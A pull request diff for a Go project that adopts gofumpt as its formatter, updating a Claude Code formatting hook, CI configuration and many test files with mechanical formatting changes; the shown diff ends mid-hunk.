### PR TITLE
build: adopt gofumpt as the canonical formatter

### DIFF
--- a/.claude/hooks/go-fmt.bats
+++ b/.claude/hooks/go-fmt.bats
@@ -67,3 +67,17 @@ GO
   [ "${status:-0}" -eq 0 ]
   grep -q "binary data" "$TMPDIR/data.gob"
 }
+
+# --- gofumpt-specific behavior (when gofumpt is installed) ---
+
+@test "applies gofumpt's stricter rules when gofumpt is available" {
+  command -v gofumpt >/dev/null || skip "gofumpt not installed; hook falls back to gofmt"
+  # A blank line right after a function's opening brace: gofumpt removes it,
+  # plain gofmt leaves it. Independent of the module's Go version (unlike the
+  # 0o octal rule), so it works on this standalone temp file.
+  printf 'package main\n\nfunc main() {\n\n\tprintln("x")\n}\n' > "$TMPDIR/blank.go"
+  result="$(run_hook "{\"tool_name\":\"Edit\",\"tool_input\":{\"file_path\":\"$TMPDIR/blank.go\"}}")" || status=$?
+  [ "${status:-0}" -eq 0 ]
+  # 2 blank lines in -> 1 after gofumpt (the post-brace blank is removed).
+  [ "$(grep -c '^$' "$TMPDIR/blank.go")" -eq 1 ]
+}

--- a/.claude/hooks/go-fmt.py
+++ b/.claude/hooks/go-fmt.py
@@ -1,7 +1,14 @@
 #!/usr/bin/env python3
-"""Claude Code PostToolUse hook: runs gofmt on .go files after Edit/Write."""
+"""Claude Code PostToolUse hook: format .go files after Edit/Write.
+
+Prefers gofumpt (the stricter formatter CI's golangci-lint enforces) when it's
+installed, and falls back to gofmt (always available with the Go toolchain).
+gofumpt is a superset of gofmt, so the fallback still formats — CI just enforces
+the remaining stricter rules.
+"""
 
 import json
+import shutil
 import subprocess
 import sys
 
@@ -13,7 +20,8 @@ def main():
     if not file_path or not file_path.endswith(".go"):
         sys.exit(0)
 
-    subprocess.run(["gofmt", "-w", file_path], capture_output=True)
+    formatter = "gofumpt" if shutil.which("gofumpt") else "gofmt"
+    subprocess.run([formatter, "-w", file_path], capture_output=True)
 
 
 if __name__ == "__main__":

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -68,6 +68,10 @@ jobs:
       - name: Set up bats
         uses: bats-core/bats-action@3.0.1
 
+      - name: Install gofumpt
+        # So the go-fmt hook test exercises gofumpt (not the gofmt fallback).
+        run: go install mvdan.cc/gofumpt@v0.9.2
+
       - name: Run tests
         run: go test -race -coverprofile=coverage.out -covermode=atomic ./...
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -24,13 +24,10 @@ jobs:
           go-version-file: go.mod
           cache: true
 
-      - name: Check formatting
-        run: |
-          if [ -n "$(gofmt -l .)" ]; then
-            echo "::error::Code is not formatted. Run 'gofmt -w .' to fix."
-            gofmt -d .
-            exit 1
-          fi
+      # Formatting (gofumpt + goimports) is enforced by golangci-lint below —
+      # it runs the configured formatters as part of `golangci-lint run` and
+      # fails on any unformatted file. Run `golangci-lint fmt` (or `make fix`)
+      # to apply.
 
       - name: Check CHANGELOG PR-link placeholders
         run: |

--- a/.golangci.yml
+++ b/.golangci.yml
@@ -145,7 +145,7 @@ issues:
 
 formatters:
   enable:
-    - gofmt         # Formatting (canonical)
+    - gofumpt       # Formatting (stricter superset of gofmt)
     - goimports     # Import organization
   exclusions:
     generated: lax

--- a/cmd/moat/cli/audit.go
+++ b/cmd/moat/cli/audit.go
@@ -97,7 +97,7 @@ func runAudit(cmd *cobra.Command, args []string) error {
 			return fmt.Errorf("marshaling bundle: %w", marshalErr)
 		}
 
-		if writeErr := os.WriteFile(auditExportFile, data, 0644); writeErr != nil {
+		if writeErr := os.WriteFile(auditExportFile, data, 0o644); writeErr != nil {
 			return fmt.Errorf("writing bundle: %w", writeErr)
 		}
 

--- a/cmd/moat/cli/daemon.go
+++ b/cmd/moat/cli/daemon.go
@@ -20,8 +20,10 @@ import (
 	"github.com/spf13/cobra"
 )
 
-var daemonDir string
-var daemonProxyPort int
+var (
+	daemonDir       string
+	daemonProxyPort int
+)
 
 var daemonCmd = &cobra.Command{
 	Use:    "_daemon",

--- a/cmd/moat/cli/exec.go
+++ b/cmd/moat/cli/exec.go
@@ -40,8 +40,10 @@ const (
 
 // Re-export types from internal/cli for backward compatibility
 // with code in cmd/moat/cli that uses these types.
-type ExecFlags = intcli.ExecFlags
-type ExecOptions = intcli.ExecOptions
+type (
+	ExecFlags   = intcli.ExecFlags
+	ExecOptions = intcli.ExecOptions
+)
 
 // AddExecFlags adds the common execution flags to a command.
 func AddExecFlags(cmd *cobra.Command, flags *ExecFlags) {
@@ -729,7 +731,7 @@ func dumpTUI(r *run.Run, ringRecorder *trace.RingRecorder, statusWriter *tui.Wri
 	flash := func(msg string) { flashMessage(statusWriter, flashMu, flashTimer, msg) }
 
 	runDir := filepath.Join(storage.DefaultBaseDir(), r.ID)
-	if err := os.MkdirAll(runDir, 0700); err != nil {
+	if err := os.MkdirAll(runDir, 0o700); err != nil {
 		log.Error("tui dump mkdir failed", "dir", runDir, "error", err)
 		flash("tui dump failed: " + err.Error())
 		return

--- a/cmd/moat/cli/grant_test.go
+++ b/cmd/moat/cli/grant_test.go
@@ -39,7 +39,6 @@ func TestGrantMCP(t *testing.T) {
 	cmd := rootCmd
 	cmd.SetArgs([]string{"grant", "mcp", "context7"})
 	err := cmd.Execute()
-
 	if err != nil {
 		t.Fatalf("grant mcp context7 failed: %v", err)
 	}
@@ -49,7 +48,6 @@ func TestGrantMCP(t *testing.T) {
 	store, _ := credential.NewFileStore(credential.DefaultStoreDir(), key)
 	// Canonical form is "mcp:<name>" (mirrors "oauth:<name>").
 	cred, err := store.Get(credential.Provider("mcp:context7"))
-
 	if err != nil {
 		t.Fatalf("failed to retrieve credential: %v", err)
 	}

--- a/cmd/moat/cli/helpers_test.go
+++ b/cmd/moat/cli/helpers_test.go
@@ -62,7 +62,7 @@ func TestResolveWorkspacePath_File(t *testing.T) {
 	// Create a temp file (not directory)
 	tempDir := t.TempDir()
 	tempFile := filepath.Join(tempDir, "testfile.txt")
-	if err := os.WriteFile(tempFile, []byte("test"), 0644); err != nil {
+	if err := os.WriteFile(tempFile, []byte("test"), 0o644); err != nil {
 		t.Fatalf("Failed to create test file: %v", err)
 	}
 

--- a/cmd/moat/cli/list_clean_test.go
+++ b/cmd/moat/cli/list_clean_test.go
@@ -23,60 +23,79 @@ func (s *listCleanStubRuntime) ListContainers(ctx context.Context) ([]container.
 // Stubs for the rest of container.Runtime — not exercised by isImageInUse.
 // These panic to catch unexpected calls if isImageInUse is ever extended.
 func (s *listCleanStubRuntime) Type() container.RuntimeType { panic("unexpected call to Type") }
+
 func (s *listCleanStubRuntime) Ping(ctx context.Context) error {
 	panic("unexpected call to Ping")
 }
+
 func (s *listCleanStubRuntime) CreateContainer(ctx context.Context, cfg container.Config) (string, error) {
 	panic("unexpected call to CreateContainer")
 }
+
 func (s *listCleanStubRuntime) StartContainer(ctx context.Context, id string) error {
 	panic("unexpected call to StartContainer")
 }
+
 func (s *listCleanStubRuntime) VolumeCreate(ctx context.Context, name string) error {
 	panic("unexpected call to VolumeCreate")
 }
+
 func (s *listCleanStubRuntime) VolumeRemove(ctx context.Context, name string, force bool) error {
 	panic("unexpected call to VolumeRemove")
 }
+
 func (s *listCleanStubRuntime) VolumeList(ctx context.Context, prefix string) ([]string, error) {
 	panic("unexpected call to VolumeList")
 }
+
 func (s *listCleanStubRuntime) VolumeExport(ctx context.Context, name, hostDir string) error {
 	panic("unexpected call to VolumeExport")
 }
+
 func (s *listCleanStubRuntime) StopContainer(ctx context.Context, id string) error {
 	panic("unexpected call to StopContainer")
 }
+
 func (s *listCleanStubRuntime) WaitContainer(ctx context.Context, id string) (int64, error) {
 	panic("unexpected call to WaitContainer")
 }
+
 func (s *listCleanStubRuntime) RemoveContainer(ctx context.Context, id string) error {
 	panic("unexpected call to RemoveContainer")
 }
+
 func (s *listCleanStubRuntime) ContainerLogs(ctx context.Context, id string) (io.ReadCloser, error) {
 	panic("unexpected call to ContainerLogs")
 }
+
 func (s *listCleanStubRuntime) ContainerLogsAll(ctx context.Context, id string) ([]byte, error) {
 	panic("unexpected call to ContainerLogsAll")
 }
+
 func (s *listCleanStubRuntime) GetPortBindings(ctx context.Context, id string) (map[int]int, error) {
 	panic("unexpected call to GetPortBindings")
 }
+
 func (s *listCleanStubRuntime) GetHostAddress() string {
 	panic("unexpected call to GetHostAddress")
 }
+
 func (s *listCleanStubRuntime) SupportsHostNetwork() bool {
 	panic("unexpected call to SupportsHostNetwork")
 }
+
 func (s *listCleanStubRuntime) NetworkManager() container.NetworkManager {
 	panic("unexpected call to NetworkManager")
 }
+
 func (s *listCleanStubRuntime) SidecarManager() container.SidecarManager {
 	panic("unexpected call to SidecarManager")
 }
+
 func (s *listCleanStubRuntime) BuildManager() container.BuildManager {
 	panic("unexpected call to BuildManager")
 }
+
 func (s *listCleanStubRuntime) ServiceManager() container.ServiceManager {
 	panic("unexpected call to ServiceManager")
 }
@@ -84,24 +103,31 @@ func (s *listCleanStubRuntime) Close() error { panic("unexpected call to Close")
 func (s *listCleanStubRuntime) SetupFirewall(ctx context.Context, id string, proxyHost string, proxyPort int) error {
 	panic("unexpected call to SetupFirewall")
 }
+
 func (s *listCleanStubRuntime) ListImages(ctx context.Context) ([]container.ImageInfo, error) {
 	panic("unexpected call to ListImages")
 }
+
 func (s *listCleanStubRuntime) ContainerState(ctx context.Context, id string) (string, error) {
 	panic("unexpected call to ContainerState")
 }
+
 func (s *listCleanStubRuntime) RemoveImage(ctx context.Context, id string) error {
 	panic("unexpected call to RemoveImage")
 }
+
 func (s *listCleanStubRuntime) StartAttached(ctx context.Context, id string, opts container.AttachOptions) error {
 	panic("unexpected call to StartAttached")
 }
+
 func (s *listCleanStubRuntime) ResizeTTY(ctx context.Context, id string, height, width uint) error {
 	panic("unexpected call to ResizeTTY")
 }
+
 func (s *listCleanStubRuntime) Exec(ctx context.Context, id string, cmd []string, stdin []byte, stdout, stderr io.Writer) error {
 	panic("unexpected call to Exec")
 }
+
 func (s *listCleanStubRuntime) ExecInteractive(ctx context.Context, id string, cmd []string, opts container.ExecOptions) error {
 	panic("unexpected call to ExecInteractive")
 }

--- a/cmd/moat/cli/volumes.go
+++ b/cmd/moat/cli/volumes.go
@@ -28,9 +28,7 @@ var volumesLsCmd = &cobra.Command{
 	RunE:  listVolumes,
 }
 
-var (
-	volumesRmForce bool
-)
+var volumesRmForce bool
 
 var volumesRmCmd = &cobra.Command{
 	Use:   "rm <agent-name>",

--- a/internal/audit/collector.go
+++ b/internal/audit/collector.go
@@ -91,7 +91,7 @@ func (c *Collector) StartUnix(socketPath string) error {
 	// - Container processes run as various UIDs, so owner-only (0200) won't work
 	// - Read permission is denied to prevent agents from verifying what was logged
 	// - The socket is bind-mounted into containers, not exposed to the host network
-	if err := os.Chmod(socketPath, 0222); err != nil {
+	if err := os.Chmod(socketPath, 0o222); err != nil {
 		listener.Close()
 		os.Remove(socketPath)
 		return fmt.Errorf("setting socket permissions: %w", err)

--- a/internal/audit/e2e_demo_test.go
+++ b/internal/audit/e2e_demo_test.go
@@ -127,7 +127,7 @@ func TestE2E_TamperProofAuditDemo(t *testing.T) {
 	store.Close()
 
 	bundleJSON, _ := json.MarshalIndent(bundle, "", "  ")
-	os.WriteFile(bundlePath, bundleJSON, 0644)
+	os.WriteFile(bundlePath, bundleJSON, 0o644)
 
 	fmt.Printf("  ✓ Bundle version: %d\n", bundle.Version)
 	fmt.Printf("  ✓ Entries: %d\n", len(bundle.Entries))

--- a/internal/audit/signer.go
+++ b/internal/audit/signer.go
@@ -45,7 +45,7 @@ func NewSigner(keyPath string) (*Signer, error) {
 		Type:  "PRIVATE KEY",
 		Bytes: privateKey,
 	}
-	if err := os.WriteFile(keyPath, pem.EncodeToMemory(block), 0600); err != nil {
+	if err := os.WriteFile(keyPath, pem.EncodeToMemory(block), 0o600); err != nil {
 		return nil, fmt.Errorf("saving key: %w", err)
 	}
 

--- a/internal/buildkit/client_test.go
+++ b/internal/buildkit/client_test.go
@@ -116,7 +116,7 @@ func TestClient_Build(t *testing.T) {
 	dockerfile := `FROM alpine:3.20
 RUN echo "BuildKit integration test"
 `
-	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0644); err != nil {
+	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0o644); err != nil {
 		t.Fatalf("WriteFile failed: %v", err)
 	}
 
@@ -130,7 +130,6 @@ RUN echo "BuildKit integration test"
 		Platform:   "linux/amd64",
 		NoCache:    true,
 	})
-
 	if err != nil {
 		t.Errorf("Build() failed: %v", err)
 	}
@@ -162,7 +161,7 @@ func TestClient_BuildWithArgs(t *testing.T) {
 ARG TEST_ARG
 RUN echo "TEST_ARG=${TEST_ARG}"
 `
-	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0644); err != nil {
+	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0o644); err != nil {
 		t.Fatalf("WriteFile failed: %v", err)
 	}
 
@@ -179,7 +178,6 @@ RUN echo "TEST_ARG=${TEST_ARG}"
 			"TEST_ARG": "test-value",
 		},
 	})
-
 	if err != nil {
 		t.Errorf("Build() with build args failed: %v", err)
 	}
@@ -206,7 +204,7 @@ func TestClient_BuildWithInvalidDockerfile(t *testing.T) {
 	dockerfile := `INVALID_INSTRUCTION this should fail
 FROM alpine:3.20
 `
-	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0644); err != nil {
+	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0o644); err != nil {
 		t.Fatalf("WriteFile failed: %v", err)
 	}
 
@@ -251,7 +249,7 @@ func TestClient_BuildWithUnreachableBuildKit(t *testing.T) {
 
 	tmpDir := t.TempDir()
 	dockerfile := `FROM alpine:3.20`
-	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0644); err != nil {
+	if err := os.WriteFile(tmpDir+"/Dockerfile", []byte(dockerfile), 0o644); err != nil {
 		t.Fatalf("WriteFile failed: %v", err)
 	}
 

--- a/internal/cli/worktree_test.go
+++ b/internal/cli/worktree_test.go
@@ -35,7 +35,7 @@ func initTestRepo(t *testing.T) string {
 	run("git", "init")
 	run("git", "remote", "add", "origin", "https://github.com/acme/myrepo.git")
 	readme := filepath.Join(tmpDir, "README.md")
-	os.WriteFile(readme, []byte("# test"), 0644)
+	os.WriteFile(readme, []byte("# test"), 0o644)
 	run("git", "add", ".")
 	run("git", "commit", "-m", "initial commit")
 

--- a/internal/config/config_test.go
+++ b/internal/config/config_test.go
@@ -31,7 +31,7 @@ grants:
 env:
   NODE_ENV: development
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -66,7 +66,7 @@ grants:
   - ssh:github.com
   - ssh:gitlab.com
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -105,7 +105,7 @@ mounts:
   - ./data:/data:ro
   - ./cache:/cache
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -134,7 +134,7 @@ mounts:
       - node_modules
       - .venv
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -268,7 +268,7 @@ volumes:
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
-			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0644)
+			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0o644)
 
 			_, err := Load(dir)
 			if err == nil {
@@ -292,7 +292,7 @@ ports:
   web: 3000
   api: 8080
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -325,7 +325,7 @@ dependencies:
   - typescript
   - protoc@25.1
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -348,7 +348,7 @@ name: myapp
 agent: test
 runtime: docker
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -368,7 +368,7 @@ name: myapp
 agent: test
 runtime: invalid
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -389,7 +389,7 @@ agent: test
 workspace:
   mode: volume
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -410,7 +410,7 @@ agent: test
 workspace:
   mode: bogus
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -435,7 +435,7 @@ container:
 dependencies:
   - node@22
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -476,7 +476,7 @@ agent: test
 container:
   memory: -1
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -496,7 +496,7 @@ agent: test
 container:
   memory: 64
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -516,7 +516,7 @@ agent: test
 container:
   cpus: -5
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -539,7 +539,7 @@ network:
     - "api.openai.com"
     - "*.amazonaws.com"
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -568,7 +568,7 @@ agent: test
 network:
   policy: permissive
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -589,7 +589,7 @@ func TestLoadConfigNetworkDefaultsToPermissive(t *testing.T) {
 	content := `
 agent: test
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -613,7 +613,7 @@ network:
   allow:
     - "example.com"
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -633,7 +633,7 @@ agent: test
 network:
   policy: invalid
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -676,7 +676,7 @@ func TestNetworkRulesConfig(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
-			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0644)
+			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0o644)
 			cfg, err := Load(dir)
 			if tt.wantErr != "" {
 				if err == nil || !strings.Contains(err.Error(), tt.wantErr) {
@@ -703,7 +703,7 @@ func TestLoadConfigRejectsInvalidSandbox(t *testing.T) {
 agent: test
 sandbox: disabled
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -722,7 +722,7 @@ func TestLoadConfigAcceptsSandboxNone(t *testing.T) {
 agent: test
 sandbox: none
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -757,7 +757,7 @@ secrets:
   OPENAI_API_KEY: op://Dev/OpenAI/api-key
   DATABASE_URL: op://Prod/Database/url
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -786,7 +786,7 @@ env:
 secrets:
   API_KEY: op://Dev/Key/value
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -806,7 +806,7 @@ agent: claude
 secrets:
   API_KEY: not-a-valid-uri
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -827,7 +827,7 @@ func TestLoadConfigWithCommand(t *testing.T) {
 agent: test
 command: ["npm", "start"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -852,7 +852,7 @@ func TestLoadConfigWithCommandShell(t *testing.T) {
 agent: test
 command: ["sh", "-c", "echo hello && npm test"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -877,7 +877,7 @@ func TestLoadConfigWithEmptyCommand(t *testing.T) {
 agent: test
 command: ["", "arg1"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -952,7 +952,7 @@ agent: test
 claude:
   sync_logs: true
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -975,7 +975,7 @@ agent: test
 command: ["bash"]
 interactive: true
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -994,7 +994,7 @@ func TestLoadConfigInteractiveDefaultFalse(t *testing.T) {
 agent: test
 command: ["npm", "start"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1016,7 +1016,7 @@ claude:
     typescript-lsp@official: true
     debug-tool@acme: false
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1051,7 +1051,7 @@ claude:
       source: directory
       path: /opt/plugins
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1165,7 +1165,7 @@ claude:
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
 			configPath := filepath.Join(dir, "moat.yaml")
-			os.WriteFile(configPath, []byte(tt.content), 0644)
+			os.WriteFile(configPath, []byte(tt.content), 0o644)
 
 			_, err := Load(dir)
 			if err == nil {
@@ -1200,7 +1200,7 @@ claude:
         API_URL: https://api.example.com
         TOKEN: "${secrets.MY_TOKEN}"
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1245,7 +1245,7 @@ claude:
       args: ["-y", "@modelcontextprotocol/server-github"]
       grant: github
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -1267,7 +1267,7 @@ claude:
     bad:
       args: ["--help"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -1303,7 +1303,7 @@ snapshots:
 tracing:
   disable_exec: false
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1367,7 +1367,7 @@ func TestSnapshotConfigDefaults(t *testing.T) {
 	content := `
 agent: test-agent
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1428,7 +1428,7 @@ func TestDefaultConfigSnapshotDefaults(t *testing.T) {
 func writeFile(t *testing.T, dir, name, content string) {
 	t.Helper()
 	path := filepath.Join(dir, name)
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatalf("writeFile: %v", err)
 	}
 }
@@ -1686,7 +1686,7 @@ agent: test
 hooks:
   post_build: git config --global core.autocrlf input
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1708,7 +1708,7 @@ hooks:
   post_build_root: apt-get install -y figlet
   pre_run: npm install
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1732,7 +1732,7 @@ func TestLoadConfigWithHooksEmpty(t *testing.T) {
 	content := `
 agent: test
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -1830,7 +1830,7 @@ func TestLoadConfigWithClaudeBaseURL(t *testing.T) {
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
 			content := "agent: claude-code\nclaude:\n  base_url: " + tt.baseURL + "\n"
-			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0644)
+			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(content), 0o644)
 
 			cfg, err := Load(dir)
 			if tt.wantErr != "" {
@@ -1982,7 +1982,7 @@ dependencies:
   - go
 language_servers:
   - go
-`), 0644)
+`), 0o644)
 
 		cfg, err := Load(dir)
 		if err != nil {
@@ -2002,7 +2002,7 @@ language_servers:
 agent: claude
 language_servers:
   - unknown-lsp
-`), 0644)
+`), 0o644)
 
 		_, err := Load(dir)
 		if err == nil {
@@ -2017,7 +2017,7 @@ language_servers:
 		dir := t.TempDir()
 		os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(`
 agent: claude
-`), 0644)
+`), 0o644)
 
 		cfg, err := Load(dir)
 		if err != nil {
@@ -2035,7 +2035,7 @@ agent: claude
 language_servers:
   - go
   - go
-`), 0644)
+`), 0o644)
 
 		_, err := Load(dir)
 		if err == nil {
@@ -2057,7 +2057,7 @@ grants:
   - anthropic
 language_servers:
   - go
-`), 0644)
+`), 0o644)
 
 		cfg, err := Load(dir)
 		if err != nil {
@@ -2086,7 +2086,7 @@ func TestLoadLegacyAgentYaml(t *testing.T) {
 agent: legacy-agent
 version: 1.0.0
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2109,8 +2109,8 @@ version: 2.0.0
 agent: legacy-agent
 version: 1.0.0
 `
-	os.WriteFile(filepath.Join(dir, ConfigFilename), []byte(moatContent), 0644)
-	os.WriteFile(filepath.Join(dir, LegacyConfigFilename), []byte(legacyContent), 0644)
+	os.WriteFile(filepath.Join(dir, ConfigFilename), []byte(moatContent), 0o644)
+	os.WriteFile(filepath.Join(dir, LegacyConfigFilename), []byte(legacyContent), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2161,7 +2161,7 @@ gemini:
       command: npx
       args: ["-y", "@modelcontextprotocol/server-github"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -2187,7 +2187,7 @@ codex:
       command: npx
       args: ["-y", "@anthropic/mcp-server-filesystem", "/workspace"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2210,7 +2210,7 @@ gemini:
       command: npx
       args: ["-y", "@modelcontextprotocol/server-github"]
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2236,7 +2236,7 @@ container:
       soft: 4096
       hard: 4096
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2344,7 +2344,7 @@ container:
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
-			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0644)
+			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0o644)
